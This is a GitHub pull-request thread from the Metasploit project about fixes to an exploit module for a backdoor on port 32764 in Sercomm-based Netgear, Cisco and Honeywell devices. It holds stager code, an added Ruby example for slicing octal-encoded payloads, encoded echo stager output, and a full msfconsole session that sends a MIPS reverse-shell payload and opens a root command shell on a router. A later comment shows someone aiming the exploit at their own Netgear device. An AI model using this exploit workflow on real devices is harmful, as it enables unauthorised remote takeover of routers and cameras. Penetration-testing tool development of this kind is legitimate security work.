Sercomm Exploit module fixes #2874

Merged
merged 1 commit into from Jan 16, 2014


@mandreko
Contributor
  • Added targets for 8 specific targets that I've tested: Cisco WAP4410N,
    Honeywell WAP-PL2 IP Camera, Netgear DG834, Netgear DG834G, Netgear
    DG834PN, Netgear DGN1000, Netgear DSG835, Netgear WPNT834
  • Added functionality to the CmdStagerEcho mix-in to support encoding via
    octal instead of hex based on the :enc_type option. This is because many
    devices would not output hex encoded values properly.
  • Added options on a per-target basis for the PackFormat (endian pack()
    values for communication), UploadPath (because /tmp wasn't always
    writable), and PayloadEncode (previously mentioned octal encoding
    option)
  • Note: For some reason, some devices communicate over one endianness, but
    then require a payload for the other endianness. I'm not sure what's
    causing this, but if those specific combinations are not used, the
    exploit fails. More research may be required for this.
@jvazquez-r7
Contributor

Processing it!

@jvazquez-r7 jvazquez-r7 and 2 others commented on an outdated diff Jan 14, 2014
lib/rex/exploitation/cmdstager/echo.rb
@@ -96,9 +104,16 @@ def slice_up_payload(encoded, opts)
while (encoded_dup.length > 0)
temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
# cut the end of the part until we reach the start
- # of a full byte representation "\\xYZ"
- while (temp.length > 0 && temp[-5, 3] != "\\\\x")
- temp.chop!
+ # of a full byte representation "\\xYZ" or "\\YZ"
+ case opts[:enc_format]
+ when 'octal'
+ while (temp.length > 0 && temp[-4, 2] != "\\\\")
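Review bot: the fixed-offset test in the octal branch, `temp[-4, 2] != "\\\\"`, only holds if every octal escape is exactly two digits wide, but the octal echo output quoted later in this thread contains escapes of one to three digits (`\\0`, `\\40`, `\\177`), so the loop can stop in the middle of an escape and a byte gets corrupted at the slice boundary. Since the encoded string is nothing but escapes, a format-independent rule is safer: chop until the character that would follow `temp` in `encoded_dup` is the backslash starting the next escape (or nothing remains), which covers the hex branch's `"\\xYZ"` and variable-width octal with one loop.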
@jvazquez-r7
jvazquez-r7 Jan 14, 2014 Contributor

This is a bad assumption: the length of the octal encoding of a byte, as output by Rex::Text.to_octal(@exe, "\\\\"), isn't always 4. It isn't constant, I mean, look at it:

[*] echo -en \\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\55\\1\\0\\0\\6\\2\\0\\0\\7\\0\\0\\0\\0\\20\\0\\0\\331\\350\\331\\164\\44\\364\\135\\273\\323\\333\\137\\1\\51\\311\\261\\60\\61\\135\\31\\203\\355\\374\\3\\135\\25\\61\\56\\65\\3\\355\\34\\112\\206\\315\\353\\115\\270\\15\\243\\123\\167\\15\\365\\23>>/tmp/sNfSV

So the stager will fail randomly when the length is not enough to store the full payload in just one command and it needs to slice it.

@jvazquez-r7
jvazquez-r7 Jan 14, 2014 Contributor

On the other side, there is also Exploit::CmdStagerPrintf, which isn't using echo but the printf command. It supports octal representation. So I recommend:

  • switch to Exploit::CmdStagerPrintf if it works smoothly with the set of targets you already have available
  • If Exploit::CmdStagerPrintf isn't good enough here, use the same approach as Exploit::CmdStagerPrintf to cut the end of a part when slicing the payload :)
@mandreko
mandreko Jan 14, 2014 Contributor

Gotcha. I'll have to fix the slicing of the payload. The CmdStagerPrintf doesn't seem to work, as a lot of the busybox installs don't have printf, or when they do, it writes a 0 byte payload.

I'll fix CmdStagerEcho ;)
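An added example (not the CmdStagerEcho code from this PR or from Metasploit) of the slicing problem discussed above, generalised to both formats: hex escapes are fixed width, while the octal escapes produced by to_octal run from one to three digits, so the slicer scans back to the last backslash instead of chopping at a fixed offset. It assumes the target's echo -e reads \NNN as up to three octal digits, as the stager output quoted above does; encode_payload, slice_up_payload, build_echo_commands and decode_payload are names chosen for this example.

```ruby
# Added example (not Metasploit's CmdStagerEcho): split an escape-encoded
# payload into "echo -en" lines without cutting an escape sequence in half.
# Hex escapes are fixed width ("\xYZ"), but octal escapes from
# Rex::Text.to_octal are 1 to 3 digits ("\0" .. "\377"), so instead of
# chopping at a fixed offset we scan back to the last backslash.

# Encode raw bytes the way the stager's two modes do (helper for this example).
def encode_payload(raw, enc_format)
  raw.each_byte.map do |b|
    enc_format == 'octal' ? format('\\%o', b) : format('\\x%02x', b)
  end.join
end

# Split +encoded+ into pieces of at most +linemax+ characters, each ending on
# an escape boundary, for both fixed-width hex and variable-width octal.
def slice_up_payload(encoded, linemax)
  parts = []
  rest = encoded.dup
  until rest.empty?
    temp = rest.slice(0, linemax)
    # The cut is safe only if the next character in +rest+ starts a new escape
    # (or nothing is left); otherwise drop back to the last backslash.
    if temp.length < rest.length && rest[temp.length] != '\\'
      idx = temp.rindex('\\')
      raise ArgumentError, 'linemax too small for one escape' if idx.nil? || idx.zero?
      temp = temp[0, idx]
    end
    parts << temp
    rest = rest[temp.length..-1]
  end
  parts
end

# Build the command lines a stager would send (constructed for this example,
# not the real module's output): each part is appended to +path+ with echo -en.
def build_echo_commands(raw, enc_format, linemax, path = '/tmp/payload')
  slice_up_payload(encode_payload(raw, enc_format), linemax).map do |part|
    "echo -en #{part}>>#{path}"
  end
end

# Reverse the encoding (what echo -e does on the device) to check the round trip.
def decode_payload(encoded)
  encoded.scan(/\\x([0-9a-f]{2})|\\([0-7]{1,3})/)
         .map { |hx, oc| hx ? hx.hex : oc.oct }.pack('C*')
end
```

Joining the parts back together and decoding them must reproduce the original bytes for every linemax that leaves room for at least one escape; a linemax smaller than that raises instead of silently emitting a truncated escape.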

@jvazquez-r7
jvazquez-r7 Jan 14, 2014 Contributor

coolio ! :)

@jvennix-r7
jvennix-r7 Jan 15, 2014 Contributor

This makes me wonder... Maybe some strange versions of echo expect that the hex string collapses the zeroes, "\x1" instead of "\x01"? Crazy, but maybe explains the failures you were seeing.

You could replace the Rex::Text.to_hex(...) call with @exe.bytes.map { |b| sprintf("\\\\x%x", b) }.join to test

@mandreko
mandreko Jan 16, 2014 Contributor

I was manually testing, and even \x41 wasn't working :(

@jvazquez-r7
Contributor

Processing, trying to help with the CmdStagerEcho changes! :)

@jvazquez-r7 jvazquez-r7 referenced this pull request in mandreko/metasploit-framework Jan 16, 2014
Merged

Clean CmdStagerEcho and Add module targets #4

@jvazquez-r7
Contributor

Hi @mandreko,

The mandreko#4 pull request tries to clean up this pull request by:

  • Cleaning the CmdStagerEcho, and now hopefully it's compatible with all the sercomm module requirements
  • Modifying the sercomm_exec module to add the Netgear N150 target
  • Modifying the sercomm_exec module to add manual targets, where the user can configure the exploitation with advanced options:
          OptEnum.new('PACKFORMAT', [false, "Pack Format to use", 'VVV', ['VVV', 'NNN']]),
          OptString.new('UPLOADPATH', [false, "Remote path to land the payload", "/tmp" ]),
          OptBool.new('NOARGS', [false, "Don't use the echo -en parameters", false ]),
          OptEnum.new('ENCODING', [false, "Payload encoding to use", 'hex', ['hex', 'octal']]),

Please feel free to check, review, discuss and land once you're comfortable and have verified it isn't breaking anything and all your targets are still working smoothly! :) Thanks a lot!

@mandreko mandreko Merge pull request #4 from jvazquez-r7/review_2874
Clean CmdStagerEcho and Add module targets
f6f2da0
@jvazquez-r7
Contributor

Module working here:

msf > use exploit/linux/misc/sercomm_exec 
msf exploit(sercomm_exec) > set rhost 192.168.0.1
rhost => 192.168.0.1
msf exploit(sercomm_exec) > set payload linux/mipsbe/shell_reverse_tcp 
payload => linux/mipsbe/shell_reverse_tcp
msf exploit(sercomm_exec) > set lhost 192.168.0.3
lhost => 192.168.0.3
msf exploit(sercomm_exec) > show options

Module options (exploit/linux/misc/sercomm_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.0.1      yes       The target address
   RPORT  32764            yes       The target port


Payload options (linux/mipsbe/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.3      yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic Linux MIPS Big Endian


msf exploit(sercomm_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Generic Linux MIPS Big Endian
   1   Generic Linux MIPS Little Endian
   2   Manual Linux MIPS Big Endian
   3   Manual Linux MIPS Little Endian
   4   Cisco WAP4410N
   5   Honeywell WAP-PL2 IP Camera
   6   Netgear DG834
   7   Netgear DG834G
   8   Netgear DG834PN
   9   Netgear DGN1000
   10  Netgear DSG835
   11  Netgear WPNT834


msf exploit(sercomm_exec) > set target 9
target => 9
msf exploit(sercomm_exec) > exploit

[*] Started reverse handler on 192.168.0.3:4444 
[*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.1:39448) at 2014-01-16 16:13:11 -0600
[*] Command Stager progress - 100.00% done (1411/1411 bytes)

pwd
/
ld
//bin/sh: ld: not found
ls
www.eng
www
wlan
var
usr
tmp
sys
sbin
proc
modemhwe.bin
lib
k2img
home
etc
dev
bin

Just giving Travis time to finish its test, then landing! Thanks @mandreko!!!

@jvazquez-r7 jvazquez-r7 added a commit that referenced this pull request Jan 16, 2014
@jvazquez-r7 jvazquez-r7 Land #2874, @mandreko's sercomm exploit fixes ac9e634
@jvazquez-r7 jvazquez-r7 merged commit f6f2da0 into rapid7:master Jan 16, 2014

@hsqrealm
hsqrealm commented Oct 6, 2015

[*] Started reverse handler on ***********
[*] Command Stager progress - 100.00% done (1164/1164 bytes)
msf exploit(sercomm_exec) >

Netgear DG834G is the router I'm trying to send the exploit to.
